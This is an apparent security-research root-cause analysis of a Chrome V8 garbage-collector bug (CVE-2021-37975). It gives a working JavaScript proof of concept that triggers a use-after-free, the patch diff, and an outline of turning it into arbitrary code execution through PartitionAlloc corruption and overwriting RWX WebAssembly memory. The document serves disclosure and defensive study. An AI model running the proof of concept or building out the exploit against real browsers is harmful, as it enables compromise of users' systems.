CVE-2021-37975: Chrome v8 garbage collector logic bug causing live objects to be collected

Man Yue Mo, GitHub Security Lab

The Basics

Disclosure or Patch Date: 30 September 2021

Product: Google Chrome

Advisory: https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop_30.html

Affected Versions: pre 94.0.4606.71

First Patched Version: 94.0.4606.71

Issue/Bug Report: https://bugs.chromium.org/p/chromium/issues/detail?id=1252918

Patch CL: https://chromium.googlesource.com/v8/v8.git/+/1054ee7f349d6be22e9518cf9b794b206d0e5818

Bug-Introducing CL: N/A

Reporter(s): Anonymous

The Code

Proof-of-concept:

var initKey = {init : 1};
var level = 4;
var map1 = new WeakMap();

function hideWeakMap(map, level, initKey) {
  let prevMap = map;
  let prevKey = initKey;
  for (let i = 0; i < level; i++) {
    let thisMap = new WeakMap();
    prevMap.set(prevKey, thisMap);
    let thisKey = {'h' : i};
    thisMap.set(prevKey, thisKey);
    prevMap = thisMap;
    prevKey = thisKey;
    if (i == level - 1) {
      let retMap = new WeakMap();
      map.set(thisKey, retMap);
      return thisKey;
    }
  }
}

function getHiddenKey(map, level, initKey) {
  let prevMap = map;
  let prevKey = initKey;
  for (let i = 0; i < level; i++) {
    let thisMap = prevMap.get(prevKey);
    let thisKey = thisMap.get(prevKey);
    prevMap = thisMap;
    prevKey = thisKey;
    if (i == level - 1) {
      return thisKey;
    }
  }
}

function setUpWeakMap(map) {
  let hk = hideWeakMap(map, level, initKey);
  let hiddenMap = map.get(hk);
  let map7 = new WeakMap();
  let map8 = new WeakMap();
  let k5 = {k5 : 1};
  let map5 = new WeakMap();
  let k7 = {k7 : 1};
  let k9 = {k9 : 1};
  let k8 = {k8 : 1};
  let v9 = {};
  map.set(k7, map7);
  map.set(k9, v9);
  hiddenMap.set(k5, map5);
  hiddenMap.set(hk, k5);
  map5.set(hk, k7);
  map7.set(k8, map8);
  map7.set(k7, k8);
  map8.set(k8, k9);
}

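function main() {
  setUpWeakMap(map1);

  // Large allocation, presumably intended to force a major garbage collection.
  new ArrayBuffer(0x7fe00000);
  // Walk the WeakMap chain again to reach the objects created in setUpWeakMap.
  let hiddenKey = getHiddenKey(map1, level, initKey);
  let hiddenMap = map1.get(hiddenKey);
  let k7 = hiddenMap.get(hiddenMap.get(hiddenKey)).get(hiddenKey);
  let k8 = map1.get(k7).get(k7);
  let map8 = map1.get(k7).get(k8);

  // map8.get(k8) is k9, so this reads v9, the object that may have been collected.
  console.log(map1.get(map8.get(k8)));
}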

while (true) {
  try {
    main();
  } catch (err) {}
}

Exploit sample: N/A

Did you have access to the exploit sample when doing the analysis? N/A

The Vulnerability

Bug class: Logic bug, but the result is use-after-free

Vulnerability details: When handling ephemerons (WeakMap, WeakSet etc.), a logic bug in the v8 garbage collector means that live objects may remain unmarked and be collected, leading to use-after-free.

Ephemerons (key-value pairs in WeakMap and WeakSet) are weak reference objects whose liveness can only be determined after all other objects are marked by the garbage collector. In the v8 garbage collector, ephemerons are first marked using an iterative algorithm in ProcessEphemeronMarking. Each iteration, shown in ProcessEphemerons below, roughly consists of three stages:

bool MarkCompactCollector::ProcessEphemerons() {
  Ephemeron ephemeron;
  bool ephemeron_marked = false;

  // Drain current_ephemerons and push ephemerons where key and value are still
  // unreachable into next_ephemerons.
  while (weak_objects_.current_ephemerons.Pop(kMainThreadTask, &ephemeron)) {   //<----- 1.
    if (ProcessEphemeron(ephemeron.key, ephemeron.value)) {
      ephemeron_marked = true;
    }
  }

  // Drain marking worklist and push discovered ephemerons into
  // discovered_ephemerons.
  DrainMarkingWorklist();                                                      //<------ 2.

  // Drain discovered_ephemerons (filled in the drain MarkingWorklist-phase
  // before) and push ephemerons where key and value are still unreachable into
  // next_ephemerons.
  while (weak_objects_.discovered_ephemerons.Pop(kMainThreadTask, &ephemeron)) {//<----- 3.
    if (ProcessEphemeron(ephemeron.key, ephemeron.value)) {
      ephemeron_marked = true;
    }
  }

  // Flush local ephemerons for main task to global pool.
  weak_objects_.ephemeron_hash_tables.FlushToGlobal(kMainThreadTask);
  weak_objects_.next_ephemerons.FlushToGlobal(kMainThreadTask);

  return ephemeron_marked;
}

In the above, stage 1 processes the ephemerons that have been discovered so far and pushes values whose keys are marked alive onto a worklist. In stage 2, the worklist is processed and additional ephemerons may be discovered (for example, if the worklist contains a WeakMap, its entries may become newly discovered ephemerons). In stage 3, these newly discovered ephemerons are processed and additional objects may be pushed onto the worklist. The iteration continues until neither stage 1 nor stage 3 adds new objects to the worklist (new objects in the worklist represent newly discovered live objects, and these need to be marked so that they are not collected).
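To make the need for iteration concrete, here is a minimal JavaScript sketch of a chain of WeakMap entries. It is not taken from V8 or from the PoC, and the names buildChain and walkChain are illustrative. Only k0 and the map are held strongly; every further key is reachable solely as the value of the previous entry, so a collector can only decide that an entry is live after it has marked the value of the entry before it.

```javascript
// Illustrative only: a chain of ephemerons inside a single WeakMap.
const map = new WeakMap();
const k0 = { name: "k0" };

// Store k0 -> k1 -> ... -> k<length> -> { payload: "v" } as WeakMap entries.
// Each key except the first is referenced only as the previous entry's value.
function buildChain(map, firstKey, length) {
  let key = firstKey;
  for (let i = 1; i <= length; i++) {
    const next = { name: "k" + i };
    map.set(key, next);
    key = next;
  }
  map.set(key, { payload: "v" });
}

// Follow the chain from firstKey until an object that is not a key is reached.
function walkChain(map, firstKey) {
  let current = firstKey;
  let hops = 0;
  while (map.has(current)) {
    current = map.get(current);
    hops++;
  }
  return { last: current, hops };
}

buildChain(map, k0, 3);
const result = walkChain(map, k0);
console.log(result.hops, result.last.payload);
```

The final payload stays reachable from script as long as k0 and the map are, so the collector must keep every link of the chain alive, even though no link is visible until the previous one has been marked.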

However, the objects processed from the worklist in stage 2 may hold strong references to previously unreachable ephemerons in current_ephemerons that were already processed in stage 1. If this happens and neither stage 1 nor stage 3 marks anything, the iteration exits even though some ephemerons from current_ephemerons have turned out to be alive. These ephemerons remain unmarked and are then collected while still alive.

Patch analysis:

The patch contains some refactoring, but the crucial part to fixing this bug is the following change:

diff --git a/src/heap/mark-compact.cc b/src/heap/mark-compact.cc
index 85e9618..dae343c 100644
--- a/src/heap/mark-compact.cc
+++ b/src/heap/mark-compact.cc
...
 bool MarkCompactCollector::ProcessEphemerons() {
   Ephemeron ephemeron;
 
   // Drain marking worklist and push discovered ephemerons into
   // discovered_ephemerons.
-  DrainMarkingWorklist();
+  size_t objects_processed;
+  std::tie(std::ignore, objects_processed) = ProcessMarkingWorklist(0);
+
+  // As soon as a single object was processed and potentially marked another
+  // object we need another iteration. Otherwise we might miss to apply
+  // ephemeron semantics on it.
+  if (objects_processed > 0) another_ephemeron_iteration = true;

Similar changes were made in concurrent-marking.cc. After the patch, the iteration continues whenever any object in the worklist is processed, which ensures that any existing ephemerons that became alive in the meantime are processed in the next iteration. This prevents such ephemerons from being left unmarked and collected.
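The effect of the bug and of the fix can be reproduced in a small toy model. The following JavaScript sketch is not V8 code: objects are plain records, marking is a Set, and every name in it (makeObject, processEphemeron, drainWorklist, markUntilFixpoint, valueSurvives) is hypothetical. It assumes the stage order of the unpatched listing and models the patch only as the extra "objects processed" check. The scenario is also an assumption chosen for illustration: holder becomes live through a discovered ephemeron in stage 3, and in the next iteration draining holder marks key only after the pair (key, value) has already been deferred by stage 1.

```javascript
// Toy model of the ephemeron fixpoint loop. NOT V8 code; all names are hypothetical.
function makeObject(name, refs = []) {
  return { name, refs }; // refs = strong references held by this object
}

// Per-ephemeron step: mark the value if the key is marked, otherwise defer
// the pair to the next iteration while key and value are both unmarked.
function processEphemeron(state, ephemeron) {
  const { key, value } = ephemeron;
  if (state.marked.has(key)) {
    if (!state.marked.has(value)) {
      state.marked.add(value);
      state.worklist.push(value);
      return true;
    }
  } else if (!state.marked.has(value)) {
    state.next.push(ephemeron);
  }
  return false;
}

// Stage 2: mark everything strongly reachable from the worklist and
// return how many objects were processed.
function drainWorklist(state) {
  let processed = 0;
  while (state.worklist.length > 0) {
    const obj = state.worklist.pop();
    processed++;
    for (const ref of obj.refs) {
      if (!state.marked.has(ref)) {
        state.marked.add(ref);
        state.worklist.push(ref);
      }
    }
  }
  return processed;
}

function processEphemerons(state, patched) {
  let anotherIteration = false;
  for (const e of state.current.splice(0)) {     // stage 1
    if (processEphemeron(state, e)) anotherIteration = true;
  }
  const processed = drainWorklist(state);        // stage 2
  // Modelled fix: any processed object forces another iteration.
  if (patched && processed > 0) anotherIteration = true;
  for (const e of state.discovered.splice(0)) {  // stage 3
    if (processEphemeron(state, e)) anotherIteration = true;
  }
  return anotherIteration;
}

function markUntilFixpoint(state, patched) {
  let workToDo;
  do {
    state.current = state.next; // deferred pairs become the current set
    state.next = [];
    workToDo = processEphemerons(state, patched);
  } while (workToDo);
}

// Returns true if the ephemeron value ends up marked (that is, survives).
function valueSurvives(patched) {
  const root = makeObject("root");
  const key = makeObject("key");
  const value = makeObject("value");
  const holder = makeObject("holder", [key]); // strong reference to key
  const state = {
    marked: new Set([root]),
    worklist: [],
    current: [],
    next: [{ key, value }],
    discovered: [{ key: root, value: holder }],
  };
  markUntilFixpoint(state, patched);
  return state.marked.has(value);
}

console.log("unpatched:", valueSurvives(false));
console.log("patched:", valueSurvives(true));
```

In this model the unpatched loop exits with value unmarked although key has been marked, while the patched loop runs one more iteration and marks value.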

Thoughts on how this vuln might have been found (fuzzing, code auditing, variant analysis, etc.):

The PoC needed to trigger the bug is fairly complex. There is also some randomness involved in triggering the bug, and concurrent marking makes the PoC significantly more complex still. While concurrent marking and other sources of randomness can be turned off using the --predictable flag, doing so may prevent the PoC from triggering at all. The bug requires a specific ordering of the entries in the WeakMap, so if the order is fixed by removing the randomness, the WeakMap constructed in the PoC may always have the wrong order, as opposed to being sometimes right and sometimes wrong. The --predictable flag therefore does not seem to make the PoC any simpler. Based on this, I believe this bug may be easier to find via manual auditing. By going through the logic of the garbage collector, recognizing the complications that ephemerons introduce, and focusing on this specific part of the code, it may be possible to identify the problem, at the very least as a functional/logic bug that requires further investigation.

(Historical/present/future) context of bug:

The bug seems to be in a very specific part of the garbage collector. I personally do not know of many security bugs in the logic of the garbage collector.

The Exploit

(The terms exploit primitive, exploit strategy, exploit technique, and exploit flow are defined here.)

Exploit strategy (or strategies):

The included proof-of-concept causes a use-after-free for an object of choice (v9 in the proof-of-concept). The simplest way to exploit the vulnerability is probably to cause a use-after-free in a TypedArray/ArrayBuffer and follow the exploit strategy in Operation WizardOpium (see also The Journey from exploiting PartitionAlloc to escaping the sandbox: Chromium Fullchain - 0CTF 2020) to corrupt metadata in PartitionAlloc. I have also written an article with a different exploit strategy that uses a JSArray as the use-after-free object.

Exploit flow:

The standard way to exploit this is probably to first cause a use-after-free in a TypedArray/ArrayBuffer, and then use it to corrupt metadata in PartitionAlloc. From there, arbitrary read and write can be obtained, after which the standard v8 technique of overwriting the body of a WebAssembly function, which is stored in an RWX region, can be followed. Calling the WASM function then leads to arbitrary code execution.

Another way to exploit the use-after-free is to use a large JSArray to cause type confusion between doubles and objects. After that, standard v8 type confusion exploit techniques can be applied.

Known cases of the same exploit flow: The TypedArray/ArrayBuffer exploit flow follows the exploit of CVE-2019-13720.

Part of an exploit chain?

This is unclear to me as I do not have any context information other than what is publicly available.

The Next Steps

Variant analysis

Areas/approach for variant analysis (and why):

While this is a bug in a very specific area in the garbage collector, there are some other areas where variants may exist:

Handling of ephemerons in other garbage collectors, such as Oilpan. Bug 1252878 appears to be the same ephemeron handling problem in Oilpan.
Other objects that require special treatment in the garbage collector.

Found variants: Bug 1252878 (patch) appears to be a variant found and fixed by the developers at around the same time as this bug was fixed. It was fixed in 94.0.4606.81 as CVE-2021-37977 and was not known to be exploited in the wild.

Structural improvements

What are structural improvements such as ways to kill the bug class, prevent the introduction of this vulnerability, mitigate the exploit flow, make this type of vulnerability harder to exploit, etc.?

Ideas to kill the bug class:

Ideas to mitigate the exploit flow:

Other potential improvements:

0-day detection methods

What are potential detection methods for similar 0-days? Meaning are there any ideas of how this exploit or similar exploits could be detected as a 0-day?